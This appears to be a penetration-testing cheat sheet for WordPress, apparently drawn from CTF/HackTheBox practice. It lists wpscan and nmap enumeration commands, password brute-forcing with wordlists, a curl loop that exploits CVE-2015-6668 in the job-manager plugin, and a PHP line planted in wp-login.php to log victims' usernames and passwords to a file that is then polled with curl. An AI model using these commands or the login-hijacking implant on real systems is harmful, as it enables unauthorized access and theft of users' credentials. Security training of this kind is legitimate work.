Wordpress

Nmap Scan
nmap -n -p<PORT> --script http-wordpress-enum <DNS>bash
wpscan
Installation
gem install wpscan
Basic Scan
wpscan --url https://example.com
Users
wpscan --url https://example.com --enumerate u
Plugins
wpscan --url https://example.com --enumerate ap
Themes
wpscan --url https://example.com --enumerate at
With output
wpscan --url https://example.com --output example.json
Custom User-Agent
wpscan --url https://example.com --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
Disable TLS check
wpscan --url https://brainfuck.htb --disable-tls-checks

Brute-Forcing

With username
wpscan --url https://example.com --passwords passwords.txt --usernames admin
With users wordlist
wpscan --url https://example.com --passwords passwords.txt --usernames users.txt
With a custom wordlist
wpscan --url https://example.com --passwords custom.txt

Vulnerability Scanner

Full Scan
wpscan --url https://example.com --enumerate vp,vt,vt
Plugins
wpscan --url https://example.com --enumerate vp
Themes
wpscan --url https://example.com --enumerate vt
Timthumbs
wpscan --url https://example.com --enumerate tt
Uses WPVulnDB
wpscan --url https://example.com --enumerate vp,vt,vt --api-token YOUR_API_TOKEN
Vulnerabilities

CVE-2015-6668

  • There is a path traversal in the job-manager plugin version 0.7.25

  • By browsing to IP/index.php/jobs/apply/8/ and modifying the number in the URL, it is possible to find the names of existing applications.

Enumerate with curl
for i in $(seq 1 25); do echo -n "$i: "; curl -s http://10.10.10.10/index.php/jobs/apply/$i/ | grep 'entry-title' | cut -d'>' -f2 | cut -d'<' -f1; done

  • Use this POC to look for files associated to an application.

Harvesting Credentials

  • If is possible to write in wp-login.php, add this line just after <?php:

file_put_contents("/var/www/html/dev_wiki/hijack.txt", $_POST['log'] . " : " . $_POST['pwd'], FILE_APPEND);

  • Use this command to get the hijacked file as soon as is used:

watch -n 1 curl -s -X GET http://10.10.10.78/dev_wiki/hijack.txt
PreviousWeb Services/FrameworksNextLaravel

Last updated